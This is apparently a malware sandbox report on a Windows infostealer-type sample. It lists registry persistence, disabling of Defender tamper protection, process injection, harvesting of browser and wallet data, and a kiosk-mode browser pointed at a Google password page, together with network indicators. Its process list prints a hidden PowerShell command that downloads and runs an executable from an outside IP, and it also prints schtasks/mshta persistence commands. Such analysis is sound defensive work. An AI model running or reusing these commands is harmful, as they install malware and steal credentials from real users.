| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\563315ef27.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110560101\\563315ef27.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cb0c0b51c3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110570101\\cb0c0b51c3.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\299f9f82e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110580101\\299f9f82e8.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2900 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe |
| PID 4480 set thread context of 2556 | N/A | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2936 set thread context of 1432 | N/A | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE
"C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe
"C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe"
C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"
C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2900 -ip 2900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 800
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe
"C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe"
C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe
"C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe
"C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe"
C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe
"C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f471028b-8d0e-4c0d-844c-b7c707138204} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2412 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e60a7b15-7d1f-4dc5-98bf-11a5d4d8f05b} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 3288 -prefMapHandle 3232 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c65ca5cb-f2ce-4287-9238-a64074ae4de6} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4056 -prefMapHandle 4052 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e02e047-153a-4efd-90cd-b8b013d6e537} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4952 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4928 -prefMapHandle 4912 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a84c741-04d9-457f-8ef3-68323687c6a2} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" utility
C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe
"C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -childID 3 -isForBrowser -prefsHandle 5244 -prefMapHandle 5248 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44683e53-4e36-41cc-9d3a-d55400203641} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5404 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afcb5a54-ddfa-4fca-b3ae-fda6b1b10b1c} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 5 -isForBrowser -prefsHandle 5540 -prefMapHandle 5380 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f4c1057-c3e5-47cd-bad4-f599bf770f88} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| GB | 142.250.200.46:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| N/A | 127.0.0.1:60556 | tcp | |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 142.250.200.46:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| N/A | 127.0.0.1:60565 | tcp | |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r2---sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2---sn-aigl6ns6.gvt1.com | tcp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
